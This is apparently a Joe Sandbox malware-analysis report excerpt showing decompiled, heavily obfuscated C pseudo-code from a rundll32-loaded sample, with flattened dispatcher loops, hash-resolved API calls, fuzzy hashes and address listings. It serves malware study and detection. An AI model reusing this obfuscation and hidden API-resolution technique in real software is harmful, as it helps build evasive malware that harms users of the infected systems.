                                                                                                                                    				_v48 = _v48 / _t348;
                                                                                                                                    				_v48 = _v48 ^ 0x000d4a68;
                                                                                                                                    				_v76 = 0xfbb4ce;
                                                                                                                                    				_v76 = _v76 << 8;
                                                                                                                                    				_v76 = _v76 + 0xffffed69;
                                                                                                                                    				_v76 = _v76 ^ 0xfbbe0169;
                                                                                                                                    				_v80 = 0xf07394;
                                                                                                                                    				_v80 = _v80 << 0xf;
                                                                                                                                    				_v80 = _v80 ^ 0x34c45092;
                                                                                                                                    				_v80 = _v80 ^ 0x0d009df4;
                                                                                                                                    				_v84 = 0xfdde74;
                                                                                                                                    				_v84 = _v84 * 0x78;
                                                                                                                                    				_v84 = _v84 << 7;
                                                                                                                                    				_v84 = _v84 << 0xa;
                                                                                                                                    				_v84 = _v84 ^ 0x8cc67a91;
                                                                                                                                    				_v20 = 0xbaf80d;
                                                                                                                                    				_t349 = 0x4e;
                                                                                                                                    				_v20 = _v20 / _t349;
                                                                                                                                    				_v20 = _v20 ^ 0x000183d9;
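                                                                                                                                    				// Dispatcher loop: each pass compares _t316 with a state constant (0x220b753, 0xd7ced6e, 0xd86d689, 0xf392ab6) and runs the matching branch; a branch that carries on stores the next state in _t316 and executes `continue`.
                                                                                                                                    				do {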
                                                                                                                                    					while(_t316 != 0x77ea95) {
                                                                                                                                    						if(_t316 == 0x220b753) {
                                                                                                                                    							_t301 =  *0x2e3dfc; // 0x0
                                                                                                                                    							_t302 = E002D5B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
                                                                                                                                    							_t352 =  &(_t352[0x10]);
                                                                                                                                    							if(_t302 == _v88) {
                                                                                                                                    								_t316 = 0xd86d689;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t316 == 0xd7ced6e) {
                                                                                                                                    								_t305 =  *0x2e3dfc; // 0x0
                                                                                                                                    								_t306 = E002D5B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
                                                                                                                                    								_t352 =  &(_t352[0x10]);
                                                                                                                                    								if(_t306 == _v108) {
                                                                                                                                    									 *_t314 = _v16;
                                                                                                                                    									_t340 = 1;
                                                                                                                                    									 *((intOrPtr*)(_t314 + 4)) = _v12;
                                                                                                                                    								} else {
                                                                                                                                    									_t316 = 0xf392ab6;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t316 == 0xd86d689) {
                                                                                                                                    									_push(_t316);
                                                                                                                                    									_push(_t316);
                                                                                                                                    									_t312 = E002C7FF2(_v12);
                                                                                                                                    									_v16 = _t312;
                                                                                                                                    									if(_t312 != 0) {
                                                                                                                                    										_t316 = 0xd7ced6e;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									if(_t316 != 0xf392ab6) {
                                                                                                                                    										goto L14;
                                                                                                                                    									} else {
                                                                                                                                    										E002D8519(_v84, _v20, _v16);
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L17:
                                                                                                                                    						return _t340;
                                                                                                                                    					}
                                                                                                                                    					_t316 = 0x220b753;
                                                                                                                                    					L14:
                                                                                                                                    				} while (_t316 != 0xf4b6a65);
                                                                                                                                    				goto L17;
                                                                                                                                    			}





















































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                                    • API String ID: 0-2314355462
                                                                                                                                    • Opcode ID: a7d199f37f794812b41b210ee33796aabcb67c9d3ea17cd18f3232093e83412d
                                                                                                                                    • Instruction ID: 6e389d437b9e90879e96a11e895af8ba2809960a42d3a98e89180445eace30ab
                                                                                                                                    • Opcode Fuzzy Hash: a7d199f37f794812b41b210ee33796aabcb67c9d3ea17cd18f3232093e83412d
                                                                                                                                    • Instruction Fuzzy Hash: 8AD10D7111C3819FC764CF65C889A1BBBF2BBC4748F50891DF6A68A220C7B6C959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002DF435(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                    				char _v128;
                                                                                                                                    				char _v256;
                                                                                                                                    				char _v288;
                                                                                                                                    				intOrPtr _v292;
                                                                                                                                    				signed int _v296;
                                                                                                                                    				signed int _v300;
                                                                                                                                    				signed int _v304;
                                                                                                                                    				signed int _v308;
                                                                                                                                    				signed int _v312;
                                                                                                                                    				signed int _v316;
                                                                                                                                    				signed int _v320;
                                                                                                                                    				signed int _v324;
                                                                                                                                    				signed int _v328;
                                                                                                                                    				signed int _v332;
                                                                                                                                    				signed int _v336;
                                                                                                                                    				signed int _v340;
                                                                                                                                    				signed int _v344;
                                                                                                                                    				signed int _v348;
                                                                                                                                    				signed int _v352;
                                                                                                                                    				signed int _v356;
                                                                                                                                    				signed int _v360;
                                                                                                                                    				signed int _v364;
                                                                                                                                    				signed int _v368;
                                                                                                                                    				signed int _v372;
                                                                                                                                    				signed int _v376;
                                                                                                                                    				signed int _v380;
                                                                                                                                    				signed int _v384;
                                                                                                                                    				signed int _v388;
                                                                                                                                    				signed int _v392;
                                                                                                                                    				signed int _v396;
                                                                                                                                    				signed int _v400;
                                                                                                                                    				signed int _v404;
                                                                                                                                    				signed int _v408;
                                                                                                                                    				signed int _v412;
                                                                                                                                    				signed int _v416;
                                                                                                                                    				signed int _v420;
                                                                                                                                    				signed int _v424;
                                                                                                                                    				signed int _v428;
                                                                                                                                    				signed int _v432;
                                                                                                                                    				signed int _v436;
                                                                                                                                    				signed int _v440;
                                                                                                                                    				signed int _v444;
                                                                                                                                    				signed int _v448;
                                                                                                                                    				signed int _v452;
                                                                                                                                    				intOrPtr* _v456;
                                                                                                                                    				signed int _v460;
                                                                                                                                    				signed int _v464;
                                                                                                                                    				signed int _v468;
                                                                                                                                    				signed int _v472;
                                                                                                                                    				signed int _v476;
                                                                                                                                    				signed int _v480;
                                                                                                                                    				signed int _v484;
                                                                                                                                    				signed int _v488;
                                                                                                                                    				signed int _v492;
                                                                                                                                    				signed int _v496;
                                                                                                                                    				signed int _v500;
                                                                                                                                    				signed int _v504;
                                                                                                                                    				signed int _v508;
                                                                                                                                    				signed int _v512;
                                                                                                                                    				signed int _v516;
                                                                                                                                    				signed int _v520;
                                                                                                                                    				void* _t551;
                                                                                                                                    				void* _t554;
                                                                                                                                    				signed int _t560;
                                                                                                                                    				void* _t563;
                                                                                                                                    				int _t566;
                                                                                                                                    				void* _t580;
                                                                                                                                    				signed int* _t582;
                                                                                                                                    				void* _t587;
                                                                                                                                    				signed int _t595;
                                                                                                                                    				void* _t598;
                                                                                                                                    				signed int _t601;
                                                                                                                                    				signed int _t602;
                                                                                                                                    				signed int _t603;
                                                                                                                                    				intOrPtr* _t610;
                                                                                                                                    				signed int _t634;
                                                                                                                                    				void* _t659;
                                                                                                                                    				signed int _t675;
                                                                                                                                    				signed int _t676;
                                                                                                                                    				signed int _t677;
                                                                                                                                    				signed int _t678;
                                                                                                                                    				signed int _t679;
                                                                                                                                    				signed int _t680;
                                                                                                                                    				void* _t682;
                                                                                                                                    				void* _t683;
                                                                                                                                    				void* _t686;
                                                                                                                                    				void* _t687;
                                                                                                                                    				signed int _t692;
                                                                                                                                    				signed int _t693;
                                                                                                                                    				signed int* _t694;
                                                                                                                                    				void* _t698;
                                                                                                                                    
                                                                                                                                    				_t694 =  &_v520;
                                                                                                                                    				_v296 = __edx;
                                                                                                                                    				_v456 = __ecx;
                                                                                                                                    				_v308 = 0x7c82e0;
                                                                                                                                    				_v308 = _v308 ^ 0x9529f8b7;
                                                                                                                                    				_v308 = _v308 ^ 0x95557a57;
                                                                                                                                    				_v444 = 0xbd655a;
                                                                                                                                    				_v444 = _v444 + 0x6586;
                                                                                                                                    				_v444 = _v444 + 0xffff1486;
                                                                                                                                    				_v444 = _v444 ^ 0x00b10b5d;
                                                                                                                                    				_v360 = 0x6df28f;
                                                                                                                                    				_v360 = _v360 >> 0xc;
                                                                                                                                    				_v360 = _v360 ^ 0xc93a0f00;
                                                                                                                                    				_v360 = _v360 ^ 0xc93b57a7;
                                                                                                                                    				_v380 = 0x803da4;
                                                                                                                                    				_v380 = _v380 + 0x81b0;
                                                                                                                                    				_v380 = _v380 << 0x10;
                                                                                                                                    				_v380 = _v380 ^ 0xbf59b73f;
                                                                                                                                    				_v484 = 0xdeaf13;
                                                                                                                                    				_v484 = _v484 | 0x05ba16e8;
                                                                                                                                    				_v484 = _v484 + 0xffff5e7b;
                                                                                                                                    				_v484 = _v484 + 0x21a5;
                                                                                                                                    				_v484 = _v484 ^ 0x05f35408;
                                                                                                                                    				_v516 = 0x9c12e3;
                                                                                                                                    				_v516 = _v516 >> 5;
                                                                                                                                    				_v516 = _v516 + 0x3879;
                                                                                                                                    				_t686 = 0x618a3a9;
                                                                                                                                    				_t676 = 0x46;
                                                                                                                                    				_v516 = _v516 / _t676;
                                                                                                                                    				_v516 = _v516 ^ 0x000beb5e;
                                                                                                                                    				_v404 = 0x49e9fe;
                                                                                                                                    				_v404 = _v404 + 0x1375;
                                                                                                                                    				_v404 = _v404 | 0x014362a3;
                                                                                                                                    				_v404 = _v404 ^ 0x01430578;
                                                                                                                                    				_v408 = 0xd49d0c;
                                                                                                                                    				_v408 = _v408 + 0x89ee;
                                                                                                                                    				_v408 = _v408 | 0xbbfa4d8a;
                                                                                                                                    				_v408 = _v408 ^ 0xbbf95772;
                                                                                                                                    				_v504 = 0x33cefe;
                                                                                                                                    				_v504 = _v504 >> 0xa;
                                                                                                                                    				_v504 = _v504 >> 0xd;
                                                                                                                                    				_v504 = _v504 + 0xffff4738;
                                                                                                                                    				_v504 = _v504 ^ 0xfff61340;
                                                                                                                                    				_v388 = 0x38423a;
                                                                                                                                    				_t75 =  &_v388; // 0x38423a
                                                                                                                                    				_t601 = 0x7b;
                                                                                                                                    				_v388 =  *_t75 * 0x2c;
                                                                                                                                    				_v388 = _v388 + 0x7a90;
                                                                                                                                    				_v388 = _v388 ^ 0x09a92ca6;
                                                                                                                                    				_v396 = 0x89c34a;
                                                                                                                                    				_v396 = _v396 >> 6;
                                                                                                                                    				_v396 = _v396 | 0xaa955d3e;
                                                                                                                                    				_v396 = _v396 ^ 0xaa9cf099;
                                                                                                                                    				_v316 = 0x54e1fb;
                                                                                                                                    				_v316 = _v316 + 0xffff88b2;
                                                                                                                                    				_v316 = _v316 ^ 0x0053b1cb;
                                                                                                                                    				_v392 = 0xd67855;
                                                                                                                                    				_v392 = _v392 + 0xd739;
                                                                                                                                    				_v392 = _v392 * 0x34;
                                                                                                                                    				_v392 = _v392 ^ 0x2bb8cf2c;
                                                                                                                                    				_v512 = 0x9dc1ac;
                                                                                                                                    				_v512 = _v512 | 0xff1b5e8c;
                                                                                                                                    				_v512 = _v512 / _t601;
                                                                                                                                    				_v512 = _v512 + 0xc237;
                                                                                                                                    				_v512 = _v512 ^ 0x02115509;
                                                                                                                                    				_v368 = 0xb0c27;
                                                                                                                                    				_v368 = _v368 * 0x3a;
                                                                                                                                    				_v368 = _v368 + 0x9417;
                                                                                                                                    				_v368 = _v368 ^ 0x028ae81d;
                                                                                                                                    				_v352 = 0x7ea940;
                                                                                                                                    				_v352 = _v352 + 0xffff6a40;
                                                                                                                                    				_v352 = _v352 | 0x1d7a7563;
                                                                                                                                    				_v352 = _v352 ^ 0x1d74a207;
                                                                                                                                    				_v340 = 0xd37cb9;
                                                                                                                                    				_v340 = _v340 >> 5;
                                                                                                                                    				_v340 = _v340 ^ 0x00021b7e;
                                                                                                                                    				_v384 = 0xc54f7c;
                                                                                                                                    				_v384 = _v384 | 0xe1c129a4;
                                                                                                                                    				_v384 = _v384 << 6;
                                                                                                                                    				_v384 = _v384 ^ 0x7152788e;
                                                                                                                                    				_v320 = 0xafdf9b;
                                                                                                                                    				_v320 = _v320 | 0x588bef45;
                                                                                                                                    				_v320 = _v320 ^ 0x58ad1127;
                                                                                                                                    				_v508 = 0x7882a6;
                                                                                                                                    				_v508 = _v508 ^ 0x5ae648f7;
                                                                                                                                    				_t677 = 0x7e;
                                                                                                                                    				_v508 = _v508 / _t677;
                                                                                                                                    				_v508 = _v508 + 0xffff266f;
                                                                                                                                    				_v508 = _v508 ^ 0x00b4570c;
                                                                                                                                    				_v344 = 0x25ec7c;
                                                                                                                                    				_t158 =  &_v344; // 0x25ec7c
                                                                                                                                    				_t692 = 0x77;
                                                                                                                                    				_v344 =  *_t158 * 0x48;
                                                                                                                                    				_v344 = _v344 ^ 0x0aab681c;
                                                                                                                                    				_v332 = 0xac456;
                                                                                                                                    				_v332 = _v332 ^ 0x143b2d92;
                                                                                                                                    				_v332 = _v332 ^ 0x1438ce6d;
                                                                                                                                    				_v436 = 0x1dd68;
                                                                                                                                    				_v436 = _v436 + 0x1e14;
                                                                                                                                    				_v436 = _v436 / _t692;
                                                                                                                                    				_v436 = _v436 ^ 0x000407e3;
                                                                                                                                    				_v468 = 0x975814;
                                                                                                                                    				_v468 = _v468 | 0x165c3dad;
                                                                                                                                    				_v468 = _v468 >> 3;
                                                                                                                                    				_v468 = _v468 + 0x9a99;
                                                                                                                                    				_v468 = _v468 ^ 0x02d4af38;
                                                                                                                                    				_v428 = 0xd1fa32;
                                                                                                                                    				_v428 = _v428 + 0x34cd;
                                                                                                                                    				_v428 = _v428 >> 0xa;
                                                                                                                                    				_v428 = _v428 ^ 0x000c7c43;
                                                                                                                                    				_v372 = 0xb93604;
                                                                                                                                    				_v372 = _v372 >> 0xb;
                                                                                                                                    				_v372 = _v372 + 0x569f;
                                                                                                                                    				_v372 = _v372 ^ 0x0001c97c;
                                                                                                                                    				_v312 = 0xb8b780;
                                                                                                                                    				_v312 = _v312 / _t601;
                                                                                                                                    				_v312 = _v312 ^ 0x0009bb57;
                                                                                                                                    				_v364 = 0xc6b8c5;
                                                                                                                                    				_v364 = _v364 >> 4;
                                                                                                                                    				_v364 = _v364 << 0xf;
                                                                                                                                    				_v364 = _v364 ^ 0x35c8234d;
                                                                                                                                    				_v500 = 0x5d2db3;
                                                                                                                                    				_v500 = _v500 | 0xa4ec7bca;
                                                                                                                                    				_v500 = _v500 * 0x42;
                                                                                                                                    				_v500 = _v500 + 0xffff6871;
                                                                                                                                    				_v500 = _v500 ^ 0x8955fb09;
                                                                                                                                    				_v492 = 0xf8ac1c;
                                                                                                                                    				_v492 = _v492 + 0xd489;
                                                                                                                                    				_v492 = _v492 | 0x938b5662;
                                                                                                                                    				_v492 = _v492 << 6;
                                                                                                                                    				_v492 = _v492 ^ 0xfef6fac0;
                                                                                                                                    				_v356 = 0x80a8a7;
                                                                                                                                    				_v356 = _v356 >> 3;
                                                                                                                                    				_v356 = _v356 + 0xffff1aa9;
                                                                                                                                    				_v356 = _v356 ^ 0x00023cc5;
                                                                                                                                    				_v420 = 0x29f504;
                                                                                                                                    				_v420 = _v420 ^ 0x96d25191;
                                                                                                                                    				_v420 = _v420 << 0xa;
                                                                                                                                    				_v420 = _v420 ^ 0xee96722c;
                                                                                                                                    				_v476 = 0x6526e6;
                                                                                                                                    				_t250 =  &_v476; // 0x6526e6
                                                                                                                                    				_t602 = 9;
                                                                                                                                    				_t678 = 0x5e;
                                                                                                                                    				_v476 =  *_t250 * 0x65;
                                                                                                                                    				_t252 =  &_v476; // 0x6526e6
                                                                                                                                    				_v476 =  *_t252 * 0x5d;
                                                                                                                                    				_v476 = _v476 + 0xffffa50d;
                                                                                                                                    				_v476 = _v476 ^ 0x7f6d4504;
                                                                                                                                    				_v304 = 0x6f90;
                                                                                                                                    				_v304 = _v304 + 0xffffb625;
                                                                                                                                    				_v304 = _v304 ^ 0x0000ce69;
                                                                                                                                    				_v348 = 0xd48165;
                                                                                                                                    				_v348 = _v348 * 0x4f;
                                                                                                                                    				_v348 = _v348 + 0xa298;
                                                                                                                                    				_v348 = _v348 ^ 0x41980148;
                                                                                                                                    				_v412 = 0x7e685b;
                                                                                                                                    				_t271 =  &_v412; // 0x7e685b
                                                                                                                                    				_v412 =  *_t271 * 0x1d;
                                                                                                                                    				_v412 = _v412 >> 0xe;
                                                                                                                                    				_v412 = _v412 ^ 0x000f1110;
                                                                                                                                    				_v460 = 0xd80dae;
                                                                                                                                    				_v460 = _v460 * 0x4a;
                                                                                                                                    				_v460 = _v460 << 9;
                                                                                                                                    				_v460 = _v460 >> 5;
                                                                                                                                    				_v460 = _v460 ^ 0x073a202e;
                                                                                                                                    				_v324 = 0x2acd4f;
                                                                                                                                    				_v324 = _v324 ^ 0x1744d618;
                                                                                                                                    				_v324 = _v324 ^ 0x1766082c;
                                                                                                                                    				_v400 = 0xe6723b;
                                                                                                                                    				_v400 = _v400 ^ 0x220d80d9;
                                                                                                                                    				_v400 = _v400 ^ 0x0161a8c1;
                                                                                                                                    				_v400 = _v400 ^ 0x238d1a3c;
                                                                                                                                    				_v376 = 0xaaa6;
                                                                                                                                    				_v376 = _v376 + 0xd31a;
                                                                                                                                    				_v376 = _v376 + 0xfffff53b;
                                                                                                                                    				_v376 = _v376 ^ 0x00079406;
                                                                                                                                    				_v452 = 0xe6cc76;
                                                                                                                                    				_v452 = _v452 ^ 0xa4c29e28;
                                                                                                                                    				_v452 = _v452 / _t602;
                                                                                                                                    				_v452 = _v452 ^ 0x123fe3c8;
                                                                                                                                    				_v520 = 0x822cac;
                                                                                                                                    				_v520 = _v520 / _t678;
                                                                                                                                    				_v520 = _v520 << 4;
                                                                                                                                    				_v520 = _v520 << 9;
                                                                                                                                    				_v520 = _v520 ^ 0x2c5f9d39;
                                                                                                                                    				_v440 = 0xafb195;
                                                                                                                                    				_v440 = _v440 + 0xffff123a;
                                                                                                                                    				_v440 = _v440 >> 0xa;
                                                                                                                                    				_v440 = _v440 ^ 0x0003dc41;
                                                                                                                                    				_v448 = 0xdf86e4;
                                                                                                                                    				_v448 = _v448 ^ 0xac60bb5d;
                                                                                                                                    				_v448 = _v448 ^ 0x5238faed;
                                                                                                                                    				_v448 = _v448 ^ 0xfe8be764;
                                                                                                                                    				_v336 = 0x3e14c9;
                                                                                                                                    				_v336 = _v336 << 7;
                                                                                                                                    				_v336 = _v336 ^ 0x1f0fc953;
                                                                                                                                    				_v496 = 0x4885f3;
                                                                                                                                    				_v496 = _v496 * 0x25;
                                                                                                                                    				_v496 = _v496 + 0x3aa8;
                                                                                                                                    				_v496 = _v496 + 0xffff73aa;
                                                                                                                                    				_v496 = _v496 ^ 0x0a7b30ee;
                                                                                                                                    				_v480 = 0xca6b34;
                                                                                                                                    				_v480 = _v480 >> 9;
                                                                                                                                    				_v480 = _v480 + 0xfb6a;
                                                                                                                                    				_v480 = _v480 / _t692;
                                                                                                                                    				_v480 = _v480 ^ 0x000164ed;
                                                                                                                                    				_v432 = 0xb19133;
                                                                                                                                    				_t679 = 0x63;
                                                                                                                                    				_t693 = _v296;
                                                                                                                                    				_v432 = _v432 * 0x53;
                                                                                                                                    				_v432 = _v432 >> 0x10;
                                                                                                                                    				_v432 = _v432 ^ 0x00018cb4;
                                                                                                                                    				_v328 = 0xdb466c;
                                                                                                                                    				_t603 = _v296;
                                                                                                                                    				_v328 = _v328 / _t679;
                                                                                                                                    				_v328 = _v328 ^ 0x000e2190;
                                                                                                                                    				_v488 = 0xd48740;
                                                                                                                                    				_t680 = 0x44;
                                                                                                                                    				_v488 = _v488 * 7;
                                                                                                                                    				_v488 = _v488 * 0x66;
                                                                                                                                    				_v488 = _v488 + 0x34f;
                                                                                                                                    				_v488 = _v488 ^ 0x50c19e73;
                                                                                                                                    				_v424 = 0xacfab2;
                                                                                                                                    				_v424 = _v424 / _t680;
                                                                                                                                    				_v424 = _v424 | 0xedf008b5;
                                                                                                                                    				_v424 = _v424 ^ 0xedf22909;
                                                                                                                                    				_v472 = 0x2e74a8;
                                                                                                                                    				_v472 = _v472 * 0x3f;
                                                                                                                                    				_v472 = _v472 ^ 0x6424471f;
                                                                                                                                    				_v472 = _v472 >> 0xb;
                                                                                                                                    				_v472 = _v472 ^ 0x0009d0c0;
                                                                                                                                    				_v416 = 0x7e19d4;
                                                                                                                                    				_v416 = _v416 << 0xd;
                                                                                                                                    				_v416 = _v416 + 0x1081;
                                                                                                                                    				_v416 = _v416 ^ 0xc3344569;
                                                                                                                                    				_v464 = 0xa74bb7;
                                                                                                                                    				_v464 = _v464 >> 0xb;
                                                                                                                                    				_v464 = _v464 + 0x9c4;
                                                                                                                                    				_v464 = _v464 >> 6;
                                                                                                                                    				_v464 = _v464 ^ 0x000976a8;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t551 = 0xf168e34;
                                                                                                                                    					do {
                                                                                                                                    						while(1) {
                                                                                                                                    							L2:
                                                                                                                                    							_t698 = _t686 - 0x7498ebf;
                                                                                                                                    							if(_t698 > 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							if(_t698 == 0) {
                                                                                                                                    								_push(_v496);
                                                                                                                                    								_push(_v336);
                                                                                                                                    								_push(_v448);
                                                                                                                                    								_t580 = E002C7F1D(_v480, _t603, _v432, E002D8606(_v440, 0x2c1560, __eflags), _v328, _v292 - _t603, _v488);
                                                                                                                                    								E002CA8B0(_v424, _t577, _v472);
                                                                                                                                    								_t582 = _v296;
                                                                                                                                    								 *_t582 = _t693;
                                                                                                                                    								_t582[1] = _t603 + _t580 - _t693;
                                                                                                                                    								goto L29;
                                                                                                                                    							}
                                                                                                                                    							if(_t686 == 0x488924) {
                                                                                                                                    								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                                    								_push(_t610);
                                                                                                                                    								_push(_t610);
                                                                                                                                    								_t693 = E002C7FF2(_t682);
                                                                                                                                    								__eflags = _t693;
                                                                                                                                    								_t551 = 0xf168e34;
                                                                                                                                    								_t610 = _v456;
                                                                                                                                    								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t686 == 0x123a276) {
                                                                                                                                    								_push(_v468);
                                                                                                                                    								_push(_v436);
                                                                                                                                    								_t587 = E002DDCF7(_v332, 0x2c15c0, __eflags);
                                                                                                                                    								_push( &_v256);
                                                                                                                                    								_push(_t587);
                                                                                                                                    								_push(_t682);
                                                                                                                                    								_push(_v300);
                                                                                                                                    								 *((intOrPtr*)(E002CA42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                                    								E002CA8B0(_v428, _t587, _v372);
                                                                                                                                    								_t694 =  &(_t694[5]);
                                                                                                                                    								_t686 = 0x488924;
                                                                                                                                    								L12:
                                                                                                                                    								_t610 = _v456;
                                                                                                                                    								while(1) {
                                                                                                                                    									L1:
                                                                                                                                    									_t551 = 0xf168e34;
                                                                                                                                    									goto L2;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							if(_t686 != 0x57ff6e7) {
                                                                                                                                    								if(_t686 == 0x5f676f3) {
                                                                                                                                    									_t598 = E002D0AE0(8, 1);
                                                                                                                                    									_push(_v516);
                                                                                                                                    									_t682 = _t598;
                                                                                                                                    									_push( &_v288);
                                                                                                                                    									_push(_t682);
                                                                                                                                    									_push(9);
                                                                                                                                    									E002C80E3(_v380, _v484);
                                                                                                                                    									_t686 = 0x7f96e60;
                                                                                                                                    									L11:
                                                                                                                                    									_t694 =  &(_t694[6]);
                                                                                                                                    									goto L12;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t686 != 0x618a3a9) {
                                                                                                                                    										goto L28;
                                                                                                                                    									} else {
                                                                                                                                    										_t686 = 0x5f676f3;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								L30:
                                                                                                                                    								return _t595;
                                                                                                                                    							}
                                                                                                                                    							_t682 = 0x4000;
                                                                                                                                    							_push(_t610);
                                                                                                                                    							_push(_t610);
                                                                                                                                    							_t595 = E002C7FF2(0x4000);
                                                                                                                                    							_v300 = _t595;
                                                                                                                                    							__eflags = _t595;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								_t686 = 0x123a276;
                                                                                                                                    								goto L12;
                                                                                                                                    							}
                                                                                                                                    							goto L30;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t686 - 0x7f96e60;
                                                                                                                                    						if(_t686 == 0x7f96e60) {
                                                                                                                                    							_t554 = E002D0AE0(0x10, 4);
                                                                                                                                    							_push(_v396);
                                                                                                                                    							_t682 = _t554;
                                                                                                                                    							_push( &_v128);
                                                                                                                                    							_push(_t682);
                                                                                                                                    							_push(0xb);
                                                                                                                                    							E002C80E3(_v504, _v388);
                                                                                                                                    							_t610 = _v456;
                                                                                                                                    							_t694 =  &(_t694[6]);
                                                                                                                                    							_t686 = 0x8d9b717;
                                                                                                                                    							_t551 = 0xf168e34;
                                                                                                                                    							goto L28;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t686 - 0x8d9b717;
                                                                                                                                    							if(_t686 == 0x8d9b717) {
                                                                                                                                    								_t687 =  &_v256;
                                                                                                                                    								_t659 = E002D0AE0(0x10, 8);
                                                                                                                                    								_t560 = _v308;
                                                                                                                                    								__eflags = _t560 - _t659;
                                                                                                                                    								if(_t560 < _t659) {
                                                                                                                                    									_t675 = _t659 - _t560;
                                                                                                                                    									_t683 = _t687;
                                                                                                                                    									_t634 = _t675 >> 1;
                                                                                                                                    									__eflags = _t634;
                                                                                                                                    									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
                                                                                                                                    									asm("adc ecx, ecx");
                                                                                                                                    									_t687 = _t687 + _t675 * 2;
                                                                                                                                    									memset(_t683 + _t634, _t566, 0);
                                                                                                                                    									_t694 =  &(_t694[6]);
                                                                                                                                    								}
                                                                                                                                    								_t563 = E002D0AE0(0x10, 8);
                                                                                                                                    								_push(_v384);
                                                                                                                                    								_t682 = _t563;
                                                                                                                                    								_push(_t687);
                                                                                                                                    								_push(_t682);
                                                                                                                                    								_push(0xb);
                                                                                                                                    								E002C80E3(_v352, _v340);
                                                                                                                                    								_t686 = 0x57ff6e7;
                                                                                                                                    								goto L11;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t686 - 0xa9d081a;
                                                                                                                                    								if(_t686 == 0xa9d081a) {
                                                                                                                                    									E002CED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
                                                                                                                                    									_t610 = _v456;
                                                                                                                                    									_t694 =  &(_t694[3]);
                                                                                                                                    									_t686 = 0x7498ebf;
                                                                                                                                    									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                                    									goto L1;
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = _t686 - 0xe639f63;
                                                                                                                                    									if(_t686 == 0xe639f63) {
                                                                                                                                    										E002D8519(_v416, _v464, _v300);
                                                                                                                                    										return 0;
                                                                                                                                    									}
                                                                                                                                    									__eflags = _t686 - _t551;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										goto L28;
                                                                                                                                    									} else {
                                                                                                                                    										_push(_v476);
                                                                                                                                    										_push(_v420);
                                                                                                                                    										_v292 = _t682 + _t693;
                                                                                                                                    										_push(_v356);
                                                                                                                                    										_t603 = E002DC0C1( &_v128, __eflags,  &_v288, E002D8606(_v492, 0x2c1610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
                                                                                                                                    										E002CA8B0(_v400, _t572, _v376);
                                                                                                                                    										_t694 =  &(_t694[0xd]);
                                                                                                                                    										_t686 = 0xa9d081a;
                                                                                                                                    										goto L12;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L30;
                                                                                                                                    						L28:
                                                                                                                                    						__eflags = _t686 - 0x7bf1275;
                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                    					L29:
                                                                                                                                    					return _v300;
                                                                                                                                    				}
                                                                                                                                    			}






























































































                                                                                                                                    0x002df8cb
                                                                                                                                    0x002df8d3
                                                                                                                                    0x002df8db
                                                                                                                                    0x002df8e3
                                                                                                                                    0x002df8e8
                                                                                                                                    0x002df8f0
                                                                                                                                    0x002df8fb
                                                                                                                                    0x002df903
                                                                                                                                    0x002df90e
                                                                                                                                    0x002df919
                                                                                                                                    0x002df921
                                                                                                                                    0x002df929
                                                                                                                                    0x002df930
                                                                                                                                    0x002df938
                                                                                                                                    0x002df940
                                                                                                                                    0x002df947
                                                                                                                                    0x002df94a
                                                                                                                                    0x002df94b
                                                                                                                                    0x002df94f
                                                                                                                                    0x002df954
                                                                                                                                    0x002df958
                                                                                                                                    0x002df960
                                                                                                                                    0x002df968
                                                                                                                                    0x002df973
                                                                                                                                    0x002df97e
                                                                                                                                    0x002df989
